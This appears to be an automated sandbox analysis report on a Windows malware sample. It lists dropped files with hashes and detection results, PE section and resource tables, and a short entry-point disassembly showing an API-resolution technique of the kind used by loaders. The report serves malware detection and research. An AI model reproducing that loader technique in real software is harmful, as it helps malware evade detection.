                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.8.<./.P.i.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4551
                                                                                                                Entropy (8bit):4.455047844874911
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwWl8zsEuJg77aI94d0OWpW8VYsYm8M4JmT7pXFBI+q8llc001gDeTd:uIjfEkI7eu7VgJmT1k2lX01gDGd
                                                                                                                MD5:56B0F75AAA8BB9555135384BCB38E616
                                                                                                                SHA1:34A92E8B3A483C66C318C2257E64027228919DBC
                                                                                                                SHA-256:40C460DA9D074F1BDAD3ADF5B2AD772E2213C93952739FC38A58F1CB71941FD0
                                                                                                                SHA-512:18FA40E9A5AA575D41E8607B2A2B1A4829DF89AE17817FA18376C8D1A317C60AD51555782BE3C98C324B8B6DC1B046FAC73069E53FB70C2160762800C4620795
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="673719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nv:9
                                                                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                Malicious:false
                                                                                                                Preview:foo.
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nv:9
                                                                                                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                Malicious:false
                                                                                                                Preview:foo.
                                                                                                                Process:C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15872
                                                                                                                Entropy (8bit):7.031113762428177
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                                                                                MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                                                                SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                                                                                SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                                                                                                SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: BXOZIGZEUa.exe, Detection: malicious, Browse
                                                                                                                • Filename: BXOZIGZEUa.exe, Detection: malicious, Browse
                                                                                                                • Filename: ArjM1qx3hV.exe, Detection: malicious, Browse
                                                                                                                • Filename: aRxo3E278B.exe, Detection: malicious, Browse
                                                                                                                • Filename: yRc7UfFif9.exe, Detection: malicious, Browse
                                                                                                                • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                                                                                                                • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                                                                                                                • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                                                                                                                • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                                                                                                                • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):422
                                                                                                                Entropy (8bit):3.9822709529024487
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:QZsiL5wmHOlDmo0qmWvclLwv2G4wmL66uCEuyLyn:QCGwv4o0BlLweTL66uuyW
                                                                                                                MD5:12848C48DA8097C0879B053388DFBAA3
                                                                                                                SHA1:EDA6082B0982F73B9AEF2FABA3F867BE30EC04C9
                                                                                                                SHA-256:2573DC5A90C39667074D2CEB4F18DA5F4713708B6CF6A52D0675707A222D392F
                                                                                                                SHA-512:C9CFFDA09CB896665BFE70F238E3F5727AB8B12F4BDDA78137A39065D769BB9F7A5022300D9E0BCD5710FFC0376983FCE29876294F4D9A2C382ACBC7EBEEEDBE
                                                                                                                Malicious:false
                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.o.c.u.m.e.n.t.s.\.1.9.C.A.D.7.2.1.B.5.9.B.0.9.B.2.0.8.B.5.A.7.E.2.F.6.3.8.7.8.4.3...i.c.o.....I.n.f.o.T.i.p.=.....Q............. ............. .................Q.Q.........................
                                                                                                                Process:C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):954368
                                                                                                                Entropy (8bit):6.344965617584001
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:YvtI2D6CEhvugYa3EZfup4jflORg0RBQI:YevLEZ7cRg0RJ
                                                                                                                MD5:8A619EBB79546DD4487F312B9C57934F
                                                                                                                SHA1:6986759E032DB2694D625C85EC5C8B4AD74A689B
                                                                                                                SHA-256:0C274B149400E89EBC0F6335A9181005B4249CABEFA8EC8B47C1D56710B2D3EF
                                                                                                                SHA-512:AB29923B35AA1D21813F9D6B012979385F7C4B161FEE51C28A4987768B93297C81E88EAA969B9F491F0A359FD18F3515CC19C694ABD95413A575053C5BA29C7B
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: CN_Honker_WordpressScanner, Description: Sample from CN Honker Pentest Toolset - file WordpressScanner.exe, Source: C:\Users\user\Desktop\update.exe, Author: Florian Roth
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......p.-.4.C.4.C.4.C.[.H.=.C.[.I.2.C...M...C.O.O.1.C.b.P...C.V.P.(.C.4.B...C.....7.C...H.E.C...I..C..H.W.C..I./.C.4.C.m.C..E.5.C.Rich4.C.........................PE..L.....|g.........................................@..........................................................................Q..,....0...e..............................................................................0............................text...n........................... ..`.rdata.............................@..@.data...j...........................@....rsrc....e...0...p... ..............@..@................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\5vrRrFN56j.exe
                                                                                                                File Type:MS Windows icon resource - 1 icon, -128x-128, 32 bits/pixel
                                                                                                                Category:dropped
                                                                                                                Size (bytes):67646
                                                                                                                Entropy (8bit):5.7039139970238075
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:vrpcQaRJlr5a3QEC2ADfYVmqpPZf++r7MJsEzlDtr66Evbag:vrpcQaGHVmOhf++razdtYp
                                                                                                                MD5:19CAD721B59B09B208B5A7E2F6387843
                                                                                                                SHA1:7AB6F085A11E86D5514E182BF0DF1C96723C8901
                                                                                                                SHA-256:F9DFF22EF297227202F34343DA1BA9585F843B3AA0834B1074F273C9D9542252
                                                                                                                SHA-512:E6DB461CB85A7B4C9F44019678E49562B68B820FFF6F0EE82A7533F710858C7AA7DF72FE57E4FE0A6A8291C33AAD819C5DCD7B75F9A55CFF12AF12344A555E81
                                                                                                                Malicious:false
                                                                                                                Preview:............ .(.......(............. .................................................200.............................................. ...! ..! ..! ..$!..$!..$"..%#..&#..&#..'$..'$..(%.!(%.&+).),*.,-+.,-+.),*.*-+.,-+.-.,.+.,.+.,.-.,.-.,.-.,.,-+.*,,.(-,.(-,.'-,.'-,.'-,.&.-.'/..)/..)/..+32.+32.-32.-32.+33.+33.-32.-32..43..43..31..31..31..31..31./42.-41.+2/.*/-.+0..+2/.+2/.-0..).,.(-+.'.+.'.+.'.+.(-+.'.+.(/,.&/,.(/,.(/,.(/,.(/,.(/,.(/,.(/,.&/,.#,).!,). +(..*'..(%..'$..%"..%"..&$..&$..$#..#"..#".."!.." .." .........................................PRR.............................................#%&.............................................. ..!!..!!..#!..$"..&$..%#..'$..&$..(%..'%..(&..(&..)'.!,*.$,+.%-,.%-,.%-,.%-,.&.-.'/..'20.(31.*21.*21.*21.+32.)33.)33.*44.(44.)55.)55.)55.)55.*66.+77.)55.)55.)55.)55.)55.)55.)55.)55.-77.-86.-86.-86.-86.-86.-86.-86.,75.+64.)42.(31.+64.+64.+32.(31.)42.'42.'42.'42.'42.'42.'42.&42.#0..#0..#0.."/-."/-.!.,.!.,.!.,..-+...+..,*..,)..*(..)&..'%..&$..%#..%$..$
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WIJSmB.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.422054257872009
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:ZSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:QvloTMW+EZMM6DFyB03w
                                                                                                                MD5:7D9910B2922194554006BE23F722FC56
                                                                                                                SHA1:FB8C5B965EE07127F495F908062A3A0775EF4E61
                                                                                                                SHA-256:0B80DDD8208BC991CA8E0F3F396A113303B869D59B0FFA5E36CFCED647611D0F
                                                                                                                SHA-512:4833D9307DE7C3FD4D376E5575E001E7063889885068F574FE080417265AFBDB9AE25593DA0ED38E87835DB2A71FA0CE11B02073D8BE0A53B275DC46B733F7D1
                                                                                                                Malicious:false
                                                                                                                Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..75.e..............................................................................................................................................................................................................................................................................................................................................Tz .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.077950124438588
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.26%
                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                File name:5vrRrFN56j.exe
                                                                                                                File size:5'541'376 bytes
                                                                                                                MD5:5ad1a67084ee167d59560fbaec7529fe
                                                                                                                SHA1:9bc3b2a106eb0a8281bfa47baeeb0369d87f8036
                                                                                                                SHA256:ddd4a05ff6d0d64d56f4e49d9afbcaa80d20304163797f08f5f18804e73f795e
                                                                                                                SHA512:8357db5780cab2b46a94f8a00bfe730e11bf0826ee6a3228fc7fa0911cbb006266c3be074fc0206ee4b1fde7615c36cef23b3b5ccd4d010330770c52f038bfa0
                                                                                                                SSDEEP:98304:4wq41aKya1ukH7iE9muTEZ7ce0RM52Pw8B4DUswLUJBAUZL:Bq41aKya1W5V0RMYPxolhJV
                                                                                                                TLSH:9846C023F142C0B2E1160AB021B6573DAA79DF515E74C983EBE4FEB9BC73122976510E
                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........D.}ID.}ID.}I+.vIM.}I+.wIB.}I?.qIA.}I..nIh.}I.. IF.}I..sIh.}ID.|I..}I&.nI[.}IM..IE.}I..oIN.}Ir.vI..}Ir.wI..}I..vI*.}I..wIt.}
                                                                                                                Icon Hash:2731d28aae6e218f
                                                                                                                Entrypoint:0x9a9000
                                                                                                                Entrypoint Section:B5xBu
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x67824263 [Sat Jan 11 10:05:23 2025 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:2bbe6c36c6f18214d3400bb75b6c0bf1
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                sub esp, 0000016Ch
                                                                                                                xor eax, eax
                                                                                                                push ebx
                                                                                                                push esi
                                                                                                                push edi
                                                                                                                mov dword ptr [ebp-24h], eax
                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                mov dword ptr [ebp-14h], eax
                                                                                                                mov dword ptr [ebp-08h], eax
                                                                                                                mov dword ptr [ebp-0Ch], eax
                                                                                                                mov dword ptr [ebp-20h], eax
                                                                                                                mov dword ptr [ebp-18h], eax
                                                                                                                mov dword ptr [ebp-48h], 534A4957h
                                                                                                                mov dword ptr [ebp-44h], 652E426Dh
                                                                                                                mov dword ptr [ebp-40h], 00006578h
                                                                                                                mov dword ptr [ebp-3Ch], 00000000h
                                                                                                                call 00007FF3F5074965h
                                                                                                                pop eax
                                                                                                                add eax, 00000225h
                                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                                mov eax, dword ptr fs:[00000030h]
                                                                                                                mov dword ptr [ebp-28h], eax
                                                                                                                mov eax, dword ptr [ebp-04h]
                                                                                                                mov dword ptr [eax], E904C483h
                                                                                                                mov eax, dword ptr [ebp-04h]
                                                                                                                mov dword ptr [eax+04h], FFC0C04Fh
                                                                                                                mov eax, dword ptr [ebp-28h]
                                                                                                                mov eax, dword ptr [eax+0Ch]
                                                                                                                mov eax, dword ptr [eax+1Ch]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                mov ecx, dword ptr [eax+3Ch]
                                                                                                                mov ecx, dword ptr [ecx+eax+78h]
                                                                                                                add ecx, eax
                                                                                                                mov edi, dword ptr [ecx+1Ch]
                                                                                                                mov ebx, dword ptr [ecx+20h]
                                                                                                                mov esi, dword ptr [ecx+24h]
                                                                                                                mov ecx, dword ptr [ecx+18h]
                                                                                                                add esi, eax
                                                                                                                add edi, eax
                                                                                                                add ebx, eax
                                                                                                                xor edx, edx
                                                                                                                mov dword ptr [ebp-30h], esi
                                                                                                                mov dword ptr [ebp-1Ch], edx
                                                                                                                mov dword ptr [ebp-34h], ecx
                                                                                                                cmp edx, dword ptr [ebp-34h]
                                                                                                                jnc 00007FF3F5074AAEh
                                                                                                                movzx ecx, word ptr [esi+edx*2]
                                                                                                                mov edx, dword ptr [ebx+edx*4]
                                                                                                                mov esi, dword ptr [edi+ecx*4]
                                                                                                                add edx, eax
                                                                                                                mov ecx, dword ptr [edx]
                                                                                                                add esi, eax
                                                                                                                cmp ecx, 4D746547h
                                                                                                                jne 00007FF3F50749B4h
                                                                                                                cmp dword ptr [edx+04h], 6C75646Fh
                                                                                                                jne 00007FF3F50749ABh
                                                                                                                Programming Language:
                                                                                                                • [ASM] VS2008 SP1 build 30729
                                                                                                                • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                • [C++] VS98 (6.0) build 8168
                                                                                                                • [ C ] VS98 (6.0) build 8168
                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x511a000x168.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a10000x791c.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x1e50000x810.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x1e370e0x1e38001eb7ef2d4573ec84862b5df4891892e3False0.3853453011892451data6.392464957311664IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x1e50000x32f3a80x32f400d0902d70205d385a7ec0ecd8421a7a90unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x5150000x8b44a0x2a200b6ae4a10d51da9b477058cdd3960dd7fFalse0.35095395956973297data5.964256341259555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x5a10000x791c0x7a00e530300d5fc7c550178f7ba7e68665ccFalse0.44041367827868855data5.293603761108245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                B5xBu0x5a90000x50000x42007c10c5d719d854eabba404eec876c26eFalse0.7772845643939394data6.934706374303615IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                TEXTINCLUDE0x5a1d9c0xbASCII text, with no line terminatorsChineseChina1.7272727272727273
                                                                                                                TEXTINCLUDE0x5a1da80x16dataChineseChina1.3636363636363635
                                                                                                                TEXTINCLUDE0x5a1dc00x151C source, ASCII text, with CRLF line terminatorsChineseChina0.6201780415430267
                                                                                                                WAVE0x5a1f140x1448RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 22050 HzChineseChina0.8330123266563945
                                                                                                                RT_CURSOR0x5a335c0x134dataChineseChina0.5811688311688312
                                                                                                                RT_CURSOR0x5a34900x134Targa image data - Map 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                                                                                                RT_CURSOR0x5a35c40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                                                                                                RT_CURSOR0x5a36f80xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                                                                                                RT_CURSOR0x5a37ac0x134AmigaOS bitmap font "(", fc_YSize 4294967292, 3840 elements, 2nd "\377\370\017\377\377\374\037\377\377\376?\377\377\377\177\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.32792207792207795
                                                                                                                RT_CURSOR0x5a38e00x134AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.3246753246753247
                                                                                                                RT_BITMAP0x5a3a140x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.3598901098901099
                                                                                                                RT_BITMAP0x5a3b800x248Device independent bitmap graphic, 64 x 15 x 4, image size 480ChineseChina0.3407534246575342
                                                                                                                RT_BITMAP0x5a3dc80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.4444444444444444
                                                                                                                RT_BITMAP0x5a3f0c0x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.26453488372093026
                                                                                                                RT_BITMAP0x5a40640x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2616279069767442
                                                                                                                RT_BITMAP0x5a41bc0x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2441860465116279
                                                                                                                RT_BITMAP0x5a43140x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.24709302325581395
                                                                                                                RT_BITMAP0x5a446c0x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2238372093023256
                                                                                                                RT_BITMAP0x5a45c40x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.19476744186046513
                                                                                                                RT_BITMAP0x5a471c0x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.20930232558139536
                                                                                                                RT_BITMAP0x5a48740x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.18895348837209303
                                                                                                                RT_BITMAP0x5a49cc0x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404ChineseChina0.34615384615384615
                                                                                                                RT_BITMAP0x5a4fb00xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                                                                                                RT_BITMAP0x5a50680x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.28296703296703296
                                                                                                                RT_BITMAP0x5a51d40x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                                                                                                RT_ICON0x5a53180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.26344086021505375
                                                                                                                RT_ICON0x5a56000x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.41216216216216217
                                                                                                                RT_ICON0x5a57280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5215759849906192
                                                                                                                RT_MENU0x5a67d00xcdataChineseChina1.5
                                                                                                                RT_MENU0x5a67dc0x284dataChineseChina0.5
                                                                                                                RT_DIALOG0x5a6a600x98dataChineseChina0.7171052631578947
                                                                                                                RT_DIALOG0x5a6af80x17adataChineseChina0.5185185185185185
                                                                                                                RT_DIALOG0x5a6c740xfadataChineseChina0.696
                                                                                                                RT_DIALOG0x5a6d700xeadataChineseChina0.6239316239316239
                                                                                                                RT_DIALOG0x5a6e5c0x8aedataChineseChina0.39603960396039606
                                                                                                                RT_DIALOG0x5a770c0xb2dataChineseChina0.7359550561797753
                                                                                                                RT_DIALOG0x5a77c00xccdataChineseChina0.7647058823529411
                                                                                                                RT_DIALOG0x5a788c0xb2dataChineseChina0.6629213483146067
                                                                                                                RT_DIALOG0x5a79400xe2dataChineseChina0.6637168141592921
                                                                                                                RT_DIALOG0x5a7a240x18cdataChineseChina0.5227272727272727
                                                                                                                RT_STRING0x5a7bb00x50dataChineseChina0.85
                                                                                                                RT_STRING0x5a7c000x2cdataChineseChina0.5909090909090909
                                                                                                                RT_STRING0x5a7c2c0x78dataChineseChina0.925
                                                                                                                RT_STRING0x5a7ca40x1c4dataChineseChina0.8141592920353983
                                                                                                                RT_STRING0x5a7e680x12adataChineseChina0.5201342281879194
                                                                                                                RT_STRING0x5a7f940x146dataChineseChina0.6288343558282209
                                                                                                                RT_STRING0x5a80dc0x40dataChineseChina0.65625
                                                                                                                RT_STRING0x5a811c0x64dataChineseChina0.73
                                                                                                                RT_STRING0x5a81800x1d8dataChineseChina0.6758474576271186
                                                                                                                RT_STRING0x5a83580x114dataChineseChina0.6376811594202898
                                                                                                                RT_STRING0x5a846c0x24dataChineseChina0.4444444444444444
                                                                                                                RT_GROUP_CURSOR0x5a84900x14dataChineseChina1.4
                                                                                                                RT_GROUP_CURSOR0x5a84a40x14dataChineseChina1.4
                                                                                                                RT_GROUP_CURSOR0x5a84b80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                                                                                                                RT_GROUP_CURSOR0x5a84cc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                                                                                                                RT_GROUP_CURSOR0x5a84e00x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                                                                                                RT_GROUP_ICON0x5a85040x14data1.2
                                                                                                                RT_GROUP_ICON0x5a85180x14dataChineseChina1.2
                                                                                                                RT_GROUP_ICON0x5a852c0x14dataChineseChina1.25
                                                                                                                RT_VERSION0x5a85400x20cdataChineseChina0.5515267175572519
                                                                                                                RT_MANIFEST0x5a874c0x1cdXML 1.0 document, ASCII text, with very long lines (461), with no line terminators0.5878524945770065
                                                                                                                DLLImport
                                                                                                                MSVFW32.dllDrawDibDraw
